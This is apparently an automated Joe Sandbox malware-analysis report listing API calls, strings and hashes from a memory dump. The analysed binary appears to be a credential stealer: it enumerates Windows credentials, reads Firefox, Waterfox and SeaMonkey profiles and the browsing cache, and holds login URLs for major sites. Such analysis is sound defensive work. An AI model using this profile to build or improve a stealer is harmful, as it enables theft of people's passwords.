                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                      • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                      • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                      • wcscpy.MSVCRT ref: 004125A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                      • String ID: P?`$r!A
                                                                                      • API String ID: 2791114272-667292750
                                                                                      • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                      • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                      • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                      • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                      • memset.MSVCRT ref: 0040BC75
                                                                                      • memset.MSVCRT ref: 0040BC8C
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                      • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                      • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                      • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                      • String ID:
                                                                                      • API String ID: 115830560-3916222277
                                                                                      • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                      • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                      • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                      • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 841 41837f-4183bf 842 4183c1-4183cc call 418197 841->842 843 4183dc-4183ec call 418160 841->843 848 4183d2-4183d8 842->848 849 418517-41851d 842->849 850 4183f6-41840b 843->850 851 4183ee-4183f1 843->851 848->843 852 418417-418423 850->852 853 41840d-418415 850->853 851->849 854 418427-418442 call 41739b 852->854 853->854 857 418444-41845d CreateFileW 854->857 858 41845f-418475 CreateFileA 854->858 859 418477-41847c 857->859 858->859 860 4184c2-4184c7 859->860 861 41847e-418495 GetLastError free 859->861 864 4184d5-418501 memset call 418758 860->864 865 4184c9-4184d3 860->865 862 4184b5-4184c0 call 444706 861->862 863 418497-4184b3 call 41837f 861->863 862->849 863->849 869 418506-418515 free 864->869 865->864 869->849
                                                                                      APIs
                                                                                      • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                      • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                      • GetLastError.KERNEL32 ref: 0041847E
                                                                                      • free.MSVCRT ref: 0041848B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile$ErrorLastfree
                                                                                      • String ID: |A
                                                                                      • API String ID: 77810686-1717621600
                                                                                      • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                      • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                      • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                      • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                      APIs
                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                        • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                        • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                      • memset.MSVCRT ref: 004033B7
                                                                                      • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                                      • wcscmp.MSVCRT ref: 004033FC
                                                                                      • _wcsicmp.MSVCRT ref: 00403439
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                                      • String ID: $0.@$P?`
                                                                                      • API String ID: 2758756878-2188525121
                                                                                      • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                      • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                      • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                                      • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                      APIs
                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                        • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                        • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                        • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                        • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                        • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                        • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                        • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                        • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                      • _wcslwr.MSVCRT ref: 0040C817
                                                                                        • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                        • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                      • wcslen.MSVCRT ref: 0040C82C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                      • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                      • API String ID: 2936932814-4196376884
                                                                                      • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                      • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                      • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                      • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 0040A824
                                                                                      • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                      • wcscpy.MSVCRT ref: 0040A854
                                                                                      • wcscat.MSVCRT ref: 0040A86A
                                                                                      • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                      • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                      • String ID: C:\Windows\system32
                                                                                      • API String ID: 669240632-2896066436
                                                                                      • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                      • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                      • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                                      • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                      APIs
                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                        • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                      • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                      • wcslen.MSVCRT ref: 0040BE06
                                                                                      • wcsncmp.MSVCRT ref: 0040BE38
                                                                                      • memset.MSVCRT ref: 0040BE91
                                                                                      • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                      • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                      • wcschr.MSVCRT ref: 0040BF24
                                                                                      • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                      • String ID:
                                                                                      • API String ID: 697348961-0
                                                                                      • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                      • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                      • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                      • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403CBF
                                                                                      • memset.MSVCRT ref: 00403CD4
                                                                                      • memset.MSVCRT ref: 00403CE9
                                                                                      • memset.MSVCRT ref: 00403CFE
                                                                                      • memset.MSVCRT ref: 00403D13
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                      • memset.MSVCRT ref: 00403DDA
                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                      • String ID: Waterfox$Waterfox\Profiles
                                                                                      • API String ID: 4039892925-11920434
                                                                                      • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                      • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                      • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                                      • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403E50
                                                                                      • memset.MSVCRT ref: 00403E65
                                                                                      • memset.MSVCRT ref: 00403E7A
                                                                                      • memset.MSVCRT ref: 00403E8F
                                                                                      • memset.MSVCRT ref: 00403EA4
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                      • memset.MSVCRT ref: 00403F6B
                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                      • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                      • API String ID: 4039892925-2068335096
                                                                                      • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                      • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                      • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                                      • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403FE1
                                                                                      • memset.MSVCRT ref: 00403FF6
                                                                                      • memset.MSVCRT ref: 0040400B
                                                                                      • memset.MSVCRT ref: 00404020
                                                                                      • memset.MSVCRT ref: 00404035
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                        • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                        • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                        • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                        • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                        • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                      • memset.MSVCRT ref: 004040FC
                                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                                      • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                      • API String ID: 4039892925-3369679110
                                                                                      • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                      • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                      • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                                      • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                      APIs
                                                                                      • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: memcpy
                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                      • API String ID: 3510742995-2641926074
                                                                                      • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                      • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                      • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                      • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                      APIs
                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.3681362254.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      • Associated: 00000005.00000002.3681362254.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_5_2_400000_LrBF2Z930N.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                      • String ID:
                                                                                      • API String ID: 2941347001-0
                                                                                      • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                      • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                      • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                                      • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403C09
                                                                                      • memset.MSVCRT ref: 00403C1E
                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                        • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                        • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                      • wcscat.MSVCRT ref: 00403C47
